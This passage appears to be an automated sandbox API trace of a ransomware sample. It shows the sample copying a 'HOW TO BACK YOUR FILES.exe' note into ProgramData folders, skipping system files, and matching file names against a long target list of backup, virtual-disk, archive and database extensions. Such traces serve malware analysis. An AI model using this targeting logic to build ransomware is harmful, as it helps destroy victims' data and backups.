lpMem=0x2e48d0 | out: hHeap=0x2b0000) returned 1 [0090.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0090.225] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC") returned 49 [0090.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC" [0090.225] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.225] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.225] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.225] GetLastError () returned 0x0 [0090.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.226] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.226] CloseHandle (hObject=0x120) returned 1 [0090.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.226] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.226] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.226] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.226] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.226] lstrcpyW (in: lpString1=0x2cce464, lpString2="Outbound" | out: lpString1="Outbound") returned="Outbound" [0090.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0090.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1908 [0090.226] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0090.226] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0090.226] lstrcmpiW (lpString1="PublishedData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.226] lstrcmpiW (lpString1="PublishedData", lpString2="aoldtz.exe") returned 1 [0090.226] lstrcpyW (in: lpString1=0x2cce464, lpString2="PublishedData" | out: lpString1="PublishedData") returned="PublishedData" [0090.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0090.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0090.226] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0090.227] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0090.227] lstrcmpiW (lpString1="StateData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.227] lstrcmpiW (lpString1="StateData", lpString2="aoldtz.exe") returned 1 [0090.227] lstrcpyW (in: lpString1=0x2cce464, lpString2="StateData" | out: lpString1="StateData") returned="StateData" [0090.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0090.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1988 [0090.227] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0090.227] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x36f738e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36f738e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0090.227] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.227] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0090.227] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData" [0090.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1988 | out: hHeap=0x2b0000) returned 1 [0090.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0090.227] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData") returned 59 [0090.227] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData" [0090.227] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.227] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\statedata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.228] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.228] GetLastError () returned 0x0 [0090.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.228] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.228] CloseHandle (hObject=0x120) returned 1 [0090.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.228] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.228] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.228] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.228] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.228] lstrcpyW (in: lpString1=0x2cce478, lpString2="RacDatabase.sdf" | out: lpString1="RacDatabase.sdf") returned="RacDatabase.sdf" [0090.229] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0090.229] lstrlenW (lpString="Ares865") returned 7 [0090.229] lstrcmpiW (lpString1="ase.sdf", lpString2="Ares865") returned 1 [0090.229] lstrlenW (lpString=".dll") returned 4 [0090.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".dll") returned 1 [0090.229] lstrlenW (lpString=".lnk") returned 4 [0090.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".lnk") returned 1 [0090.229] lstrlenW (lpString=".ini") returned 4 [0090.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".ini") returned 1 [0090.229] lstrlenW (lpString=".sys") returned 4 [0090.229] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".sys") returned 1 [0090.229] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0090.229] lstrlenW (lpString="bak") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="bak") returned 1 [0090.229] lstrlenW (lpString="ba_") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="ba_") returned 1 [0090.229] lstrlenW (lpString="dbb") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="dbb") returned 1 [0090.229] lstrlenW (lpString="vmdk") returned 4 [0090.229] lstrcmpiW (lpString1=".sdf", lpString2="vmdk") returned -1 [0090.229] lstrlenW (lpString="rar") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="rar") returned 1 [0090.229] lstrlenW (lpString="zip") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="zip") returned -1 [0090.229] lstrlenW (lpString="tgz") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="tgz") returned -1 [0090.229] lstrlenW (lpString="vbox") returned 4 [0090.229] lstrcmpiW (lpString1=".sdf", lpString2="vbox") returned -1 [0090.229] lstrlenW (lpString="vdi") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="vdi") returned -1 [0090.229] lstrlenW (lpString="vhd") returned 3 [0090.229] lstrcmpiW (lpString1="sdf", lpString2="vhd") returned -1 [0090.229] lstrlenW (lpString="vhdx") returned 4 [0090.229] lstrcmpiW (lpString1=".sdf", lpString2="vhdx") returned -1 [0090.229] lstrlenW (lpString="avhd") returned 4 [0090.229] lstrcmpiW (lpString1=".sdf", lpString2="avhd") returned -1 [0090.229] lstrlenW (lpString="db") returned 2 [0090.229] lstrcmpiW (lpString1="df", lpString2="db") returned 1 [0090.230] lstrlenW (lpString="db2") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="db2") returned 1 [0090.230] lstrlenW (lpString="db3") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="db3") returned 1 [0090.230] lstrlenW (lpString="dbf") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="dbf") returned 1 [0090.230] lstrlenW (lpString="mdf") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="mdf") returned 1 [0090.230] lstrlenW (lpString="mdb") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="mdb") returned 1 [0090.230] lstrlenW (lpString="sql") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="sql") returned -1 [0090.230] lstrlenW (lpString="sqlite") returned 6 [0090.230] lstrcmpiW (lpString1="se.sdf", lpString2="sqlite") returned -1 [0090.230] lstrlenW (lpString="sqlite3") returned 7 [0090.230] lstrcmpiW (lpString1="ase.sdf", lpString2="sqlite3") returned -1 [0090.230] lstrlenW (lpString="sqlitedb") returned 8 [0090.230] lstrcmpiW (lpString1="base.sdf", lpString2="sqlitedb") returned -1 [0090.230] lstrlenW (lpString="xml") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="xml") returned -1 [0090.230] lstrlenW (lpString="$er") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="$er") returned 1 [0090.230] lstrlenW (lpString="4dd") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="4dd") returned 1 [0090.230] lstrlenW (lpString="4dl") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="4dl") returned 1 [0090.230] lstrlenW (lpString="^^^") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="^^^") returned 1 [0090.230] lstrlenW (lpString="abs") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="abs") returned 1 [0090.230] lstrlenW (lpString="abx") returned 3 [0090.230] lstrcmpiW (lpString1="sdf", lpString2="abx") returned 1 [0090.230] lstrlenW (lpString="accdb") returned 5 [0090.230] lstrcmpiW (lpString1="e.sdf", lpString2="accdb") returned 1 [0090.230] lstrlenW (lpString="accdc") returned 5 [0090.230] lstrcmpiW (lpString1="e.sdf", lpString2="accdc") returned 1 [0090.230] lstrlenW (lpString="accde") returned 5 [0090.230] lstrcmpiW (lpString1="e.sdf", lpString2="accde") returned 1 [0090.231] lstrlenW (lpString="accdr") returned 5 [0090.231] lstrcmpiW (lpString1="e.sdf", lpString2="accdr") returned 1 [0090.231] lstrlenW (lpString="accdt") returned 5 [0090.231] lstrcmpiW (lpString1="e.sdf", lpString2="accdt") returned 1 [0090.231] lstrlenW (lpString="accdw") returned 5 [0090.231] lstrcmpiW (lpString1="e.sdf", lpString2="accdw") returned 1 [0090.231] lstrlenW (lpString="accft") returned 5 [0090.231] lstrcmpiW (lpString1="e.sdf", lpString2="accft") returned 1 [0090.231] lstrlenW (lpString="adb") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0090.231] lstrlenW (lpString="adb") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0090.231] lstrlenW (lpString="ade") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="ade") returned 1 [0090.231] lstrlenW (lpString="adf") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="adf") returned 1 [0090.231] lstrlenW (lpString="adn") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="adn") returned 1 [0090.231] lstrlenW (lpString="adp") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="adp") returned 1 [0090.231] lstrlenW (lpString="alf") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="alf") returned 1 [0090.231] lstrlenW (lpString="ask") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="ask") returned 1 [0090.231] lstrlenW (lpString="btr") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="btr") returned 1 [0090.231] lstrlenW (lpString="cat") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="cat") returned 1 [0090.231] lstrlenW (lpString="cdb") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="cdb") returned 1 [0090.231] lstrlenW (lpString="ckp") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="ckp") returned 1 [0090.231] lstrlenW (lpString="cma") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="cma") returned 1 [0090.231] lstrlenW (lpString="cpd") returned 3 [0090.231] lstrcmpiW (lpString1="sdf", lpString2="cpd") returned 1 [0090.231] lstrlenW (lpString="dacpac") returned 6 [0090.231] lstrcmpiW (lpString1="se.sdf", lpString2="dacpac") returned 1 [0090.231] lstrlenW (lpString="dad") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dad") returned 1 [0090.232] lstrlenW (lpString="dadiagrams") returned 10 [0090.232] lstrcmpiW (lpString1="tabase.sdf", lpString2="dadiagrams") returned 1 [0090.232] lstrlenW (lpString="daschema") returned 8 [0090.232] lstrcmpiW (lpString1="base.sdf", lpString2="daschema") returned -1 [0090.232] lstrlenW (lpString="db-journal") returned 10 [0090.232] lstrcmpiW (lpString1="tabase.sdf", lpString2="db-journal") returned 1 [0090.232] lstrlenW (lpString="db-shm") returned 6 [0090.232] lstrcmpiW (lpString1="se.sdf", lpString2="db-shm") returned 1 [0090.232] lstrlenW (lpString="db-wal") returned 6 [0090.232] lstrcmpiW (lpString1="se.sdf", lpString2="db-wal") returned 1 [0090.232] lstrlenW (lpString="dbc") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dbc") returned 1 [0090.232] lstrlenW (lpString="dbs") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dbs") returned 1 [0090.232] lstrlenW (lpString="dbt") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dbt") returned 1 [0090.232] lstrlenW (lpString="dbv") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dbv") returned 1 [0090.232] lstrlenW (lpString="dbx") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dbx") returned 1 [0090.232] lstrlenW (lpString="dcb") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dcb") returned 1 [0090.232] lstrlenW (lpString="dct") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dct") returned 1 [0090.232] lstrlenW (lpString="dcx") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dcx") returned 1 [0090.232] lstrlenW (lpString="ddl") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="ddl") returned 1 [0090.232] lstrlenW (lpString="dlis") returned 4 [0090.232] lstrcmpiW (lpString1=".sdf", lpString2="dlis") returned -1 [0090.232] lstrlenW (lpString="dp1") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dp1") returned 1 [0090.232] lstrlenW (lpString="dqy") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dqy") returned 1 [0090.232] lstrlenW (lpString="dsk") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dsk") returned 1 [0090.232] lstrlenW (lpString="dsn") returned 3 [0090.232] lstrcmpiW (lpString1="sdf", lpString2="dsn") returned 1 [0090.232] lstrlenW (lpString="dtsx") returned 4 [0090.233] lstrcmpiW (lpString1=".sdf", lpString2="dtsx") returned -1 [0090.233] lstrlenW (lpString="dxl") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="dxl") returned 1 [0090.233] lstrlenW (lpString="eco") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="eco") returned 1 [0090.233] lstrlenW (lpString="ecx") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="ecx") returned 1 [0090.233] lstrlenW (lpString="edb") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="edb") returned 1 [0090.233] lstrlenW (lpString="epim") returned 4 [0090.233] lstrcmpiW (lpString1=".sdf", lpString2="epim") returned -1 [0090.233] lstrlenW (lpString="fcd") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fcd") returned 1 [0090.233] lstrlenW (lpString="fdb") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fdb") returned 1 [0090.233] lstrlenW (lpString="fic") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fic") returned 1 [0090.233] lstrlenW (lpString="flexolibrary") returned 12 [0090.233] lstrcmpiW (lpString1="Database.sdf", lpString2="flexolibrary") returned -1 [0090.233] lstrlenW (lpString="fm5") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fm5") returned 1 [0090.233] lstrlenW (lpString="fmp") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fmp") returned 1 [0090.233] lstrlenW (lpString="fmp12") returned 5 [0090.233] lstrcmpiW (lpString1="e.sdf", lpString2="fmp12") returned -1 [0090.233] lstrlenW (lpString="fmpsl") returned 5 [0090.233] lstrcmpiW (lpString1="e.sdf", lpString2="fmpsl") returned -1 [0090.233] lstrlenW (lpString="fol") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fol") returned 1 [0090.233] lstrlenW (lpString="fp3") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fp3") returned 1 [0090.233] lstrlenW (lpString="fp4") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fp4") returned 1 [0090.233] lstrlenW (lpString="fp5") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fp5") returned 1 [0090.233] lstrlenW (lpString="fp7") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fp7") returned 1 [0090.233] lstrlenW (lpString="fpt") returned 3 [0090.233] lstrcmpiW (lpString1="sdf", lpString2="fpt") returned 1 [0090.234] lstrlenW (lpString="frm") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="frm") returned 1 [0090.234] lstrlenW (lpString="gdb") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0090.234] lstrlenW (lpString="gdb") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0090.234] lstrlenW (lpString="grdb") returned 4 [0090.234] lstrcmpiW (lpString1=".sdf", lpString2="grdb") returned -1 [0090.234] lstrlenW (lpString="gwi") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="gwi") returned 1 [0090.234] lstrlenW (lpString="hdb") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="hdb") returned 1 [0090.234] lstrlenW (lpString="his") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="his") returned 1 [0090.234] lstrlenW (lpString="ib") returned 2 [0090.234] lstrcmpiW (lpString1="df", lpString2="ib") returned -1 [0090.234] lstrlenW (lpString="idb") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="idb") returned 1 [0090.234] lstrlenW (lpString="ihx") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="ihx") returned 1 [0090.234] lstrlenW (lpString="itdb") returned 4 [0090.234] lstrcmpiW (lpString1=".sdf", lpString2="itdb") returned -1 [0090.234] lstrlenW (lpString="itw") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="itw") returned 1 [0090.234] lstrlenW (lpString="jet") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="jet") returned 1 [0090.234] lstrlenW (lpString="jtx") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="jtx") returned 1 [0090.234] lstrlenW (lpString="kdb") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="kdb") returned 1 [0090.234] lstrlenW (lpString="kexi") returned 4 [0090.234] lstrcmpiW (lpString1=".sdf", lpString2="kexi") returned -1 [0090.234] lstrlenW (lpString="kexic") returned 5 [0090.234] lstrcmpiW (lpString1="e.sdf", lpString2="kexic") returned -1 [0090.234] lstrlenW (lpString="kexis") returned 5 [0090.234] lstrcmpiW (lpString1="e.sdf", lpString2="kexis") returned -1 [0090.234] lstrlenW (lpString="lgc") returned 3 [0090.234] lstrcmpiW (lpString1="sdf", lpString2="lgc") returned 1 [0090.235] lstrlenW (lpString="lwx") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="lwx") returned 1 [0090.235] lstrlenW (lpString="maf") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="maf") returned 1 [0090.235] lstrlenW (lpString="maq") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="maq") returned 1 [0090.235] lstrlenW (lpString="mar") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mar") returned 1 [0090.235] lstrlenW (lpString="marshal") returned 7 [0090.235] lstrcmpiW (lpString1="ase.sdf", lpString2="marshal") returned -1 [0090.235] lstrlenW (lpString="mas") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mas") returned 1 [0090.235] lstrlenW (lpString="mav") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mav") returned 1 [0090.235] lstrlenW (lpString="maw") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="maw") returned 1 [0090.235] lstrlenW (lpString="mdbhtml") returned 7 [0090.235] lstrcmpiW (lpString1="ase.sdf", lpString2="mdbhtml") returned -1 [0090.235] lstrlenW (lpString="mdn") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mdn") returned 1 [0090.235] lstrlenW (lpString="mdt") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mdt") returned 1 [0090.235] lstrlenW (lpString="mfd") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mfd") returned 1 [0090.235] lstrlenW (lpString="mpd") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mpd") returned 1 [0090.235] lstrlenW (lpString="mrg") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mrg") returned 1 [0090.235] lstrlenW (lpString="mud") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mud") returned 1 [0090.235] lstrlenW (lpString="mwb") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="mwb") returned 1 [0090.235] lstrlenW (lpString="myd") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="myd") returned 1 [0090.235] lstrlenW (lpString="ndf") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="ndf") returned 1 [0090.235] lstrlenW (lpString="nnt") returned 3 [0090.235] lstrcmpiW (lpString1="sdf", lpString2="nnt") returned 1 [0090.235] lstrlenW (lpString="nrmlib") returned 6 [0090.236] lstrcmpiW (lpString1="se.sdf", lpString2="nrmlib") returned 1 [0090.236] lstrlenW (lpString="ns2") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="ns2") returned 1 [0090.236] lstrlenW (lpString="ns3") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="ns3") returned 1 [0090.236] lstrlenW (lpString="ns4") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="ns4") returned 1 [0090.236] lstrlenW (lpString="nsf") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="nsf") returned 1 [0090.236] lstrlenW (lpString="nv") returned 2 [0090.236] lstrcmpiW (lpString1="df", lpString2="nv") returned -1 [0090.236] lstrlenW (lpString="nv2") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="nv2") returned 1 [0090.236] lstrlenW (lpString="nwdb") returned 4 [0090.236] lstrcmpiW (lpString1=".sdf", lpString2="nwdb") returned -1 [0090.236] lstrlenW (lpString="nyf") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="nyf") returned 1 [0090.236] lstrlenW (lpString="odb") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0090.236] lstrlenW (lpString="odb") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0090.236] lstrlenW (lpString="oqy") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="oqy") returned 1 [0090.236] lstrlenW (lpString="ora") returned 3 [0090.236] lstrcmpiW (lpString1="sdf", lpString2="ora") returned 1 [0090.236] 